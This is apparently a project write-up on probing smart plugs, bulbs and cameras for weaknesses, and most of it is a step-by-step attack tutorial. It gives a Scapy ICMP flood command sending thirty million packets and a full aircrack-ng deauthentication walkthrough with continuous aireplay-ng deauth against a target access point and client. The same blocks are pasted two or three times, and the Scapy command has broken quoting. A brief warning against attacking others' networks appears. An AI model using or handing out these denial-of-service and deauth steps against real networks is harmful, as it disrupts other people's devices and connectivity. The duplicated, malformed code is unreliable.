The project's aim is to identify vulnerabilities in smart devices. Our focus centers on IoT devices, specifically Smart Plugs, Smart Bulbs, and Smart Cameras. We have conducted an in-depth analysis of the data packets that initiate the ON and OFF conditions in these devices. Additionally, we have thoroughly evaluated the communication protocols they employ. This investigation enables us to understand and pinpoint potential security weaknesses within these smart devices' operational frameworks.
To check the vulnerability of the device, we performed several attacks on the device. For executing these attacks on smart devices we used Scapy tool for DoS attack and also we implemented the Deauthentication attack. But, because the bulb is using bluetooth for authentication. As a result the De-authentication didn’t work successfully. Only the DoS attack using Scapy tool successfully worked.
To perform the DoS attack we used Scapy tool, to implement the attack we required the IP address of the targeted device and to discover the IP address we can use NMAP and arp command in linux or we can download the Advanced IP scanner tool which is free and easily available.
Here we used the below command and sent multiple packets to interrupt the communication between the mobile app and smart devices.
Step 1: Install the scapy tool in your kali-linux machine.
$ sudo sudo apt install python3-scapy
or
$ sudo sudo apt install scapy
After that run the scapy tool
$scapy
Step 2 : Open the wireshark and start monitoring the network activity.
Step 3 : Implementing the DOS attack
>> send(IP(src=“(device IP address of smart bulb)",dst=" (“device IP address of smart bulb ")/ICMP(), count=30000000)
While looking for the vulnerability of the smart plug, we performed several attacks on the device. For executing these attacks on smart devices we used Scapy tool for DoS attack and also we implemented the Deauthentication attack. Because the plug is using WiFi for authentication and communication. As a result the De-authentication worked successfully.
Step 1 : To perform the deauth attack we need to install the aircrack-ng suite.
Step 1: Install aircrack-ng
Note : If you are using Kali or Parrot then aircrack-ng is already pre-installed in your system so you may skip this step.
$sudo apt-get update
$sudo apt-get install aircrack-ng
Step 2: Find the network adapter you are going to use
$iwconfig #lists all available wireless cards
Step 3: Putting your adapter in monitor mode
$sudo airmon-ng check kill #kills all active processes running on the adapter
$sudo airmon-ng start (available wireless cards) #set our adapter in monitor mode
$sudo airmon-ng start wlan0 #for example my wireless card is wlan0
Step 4: Scout for APs
$sudo airodump-ng wlan0mon #scans and lists all clients and APs in range
we press Ctrl+C to stop the scan whenever we want.
Step 5: Scan for targets
$sudo airodump-ng -d target_BSSID -c channel_num adapters_mon_name
#-d selecting BSSID
#-c channel
Step 6: De-authenticating the target
$aireplay-ng -0 0 -a target_BSSID -c clients_address adapters_mon_name
#-0 stands for de-authentication (the following 0 means that there is no waiting time between each #"package delivery" they are sent continuously) #-a address of AP #-c client For example :
>> sudo aireplay-ng -0 0 -a 2A:22:E9:6E:XX:XX -c 38:E6:0A:25:XX:XX wlo1mon
You’ve done it! You are now performing a deauth attack. If you wish to stop you just press Ctrl+C.
Extra Step:
If you were using the same adapter you use for internet connection then you lost internet connection once you set it to monitor mode. After you are done with your deauth attack you simply type the following commands:
$sudo airmon-ng stop wlan0mon #this will stop the monitor mode
$sudo systemctl start NetworkManager #restart the wireless interface
Final Note: Do not mess around with public APs or APs that are not your own, it may seem cool…but it’s NOT.
Step 1: Install the scapy tool in your kali-linux machine.
$ sudo sudo apt install python3-scapy
or
$ sudo sudo apt install scapy
After that run the scapy tool
$scapy
Step 2 : Open the wireshark and start monitoring the network activity.
Step 3 : Implementing the DOS attack
>> send(IP(src=“(device IP address of smart bulb)",dst=" (“device IP address of smart bulb ")/ICMP(), count=30000000)
Step 1 : To perform the deauth attack we need to install the aircrack-ng suite.
Step 1: Install aircrack-ng
Note : If you are using Kali or Parrot then aircrack-ng is already pre-installed in your system so you may skip this step.
$sudo apt-get update
$sudo apt-get install aircrack-ng
Step 2: Find the network adapter you are going to use
$iwconfig #lists all available wireless cards
Step 3: Putting your adapter in monitor mode
$sudo airmon-ng check kill #kills all active processes running on the adapter
$sudo airmon-ng start (available wireless cards) #set our adapter in monitor mode
$sudo airmon-ng start wlan0 #for example my wireless card is wlan0
Step 4: Scout for APs
$sudo airodump-ng wlan0mon #scans and lists all clients and APs in range
we press Ctrl+C to stop the scan whenever we want.
Step 5: Scan for targets
$sudo airodump-ng -d target_BSSID -c channel_num adapters_mon_name
#-d selecting BSSID #-c channel
Step 6: De-authenticating the target
$aireplay-ng -0 0 -a target_BSSID -c clients_address adapters_mon_name
#-0 stands for de-authentication (the following 0 means that there is no waiting time between each #"package delivery" they are sent continuously) #-a address of AP #-c client For example :
>> sudo aireplay-ng -0 0 -a 2A:22:E9:6E:XX:XX -c 38:E6:0A:25:XX:XX wlo1mon
You’ve done it! You are now performing a deauth attack. If you wish to stop you just press Ctrl+C.
Extra Step:
If you were using the same adapter you use for internet connection then you lost internet connection once you set it to monitor mode. After you are done with your deauth attack you simply type the following commands:
$sudo airmon-ng stop wlan0mon #this will stop the monitor mode
$sudo systemctl start NetworkManager #restart the wireless interface
Final Note: Do not mess around with public APs or APs that are not your own, it may seem cool…but it’s NOT.
Step 1: Install the scapy tool in your kali-linux machine.
$ sudo sudo apt install python3-scapy
or
$ sudo sudo apt install scapy
After that run the scapy tool
$scapy
Step 2 : Open the wireshark and start monitoring the network activity.
Step 3 : Implementing the DOS attack
>> send(IP(src=“(device IP address of smart bulb)",dst=" (“device IP address of smart bulb ")/ICMP(), count=30000000)
References:
- Collaborator Prajakta Meher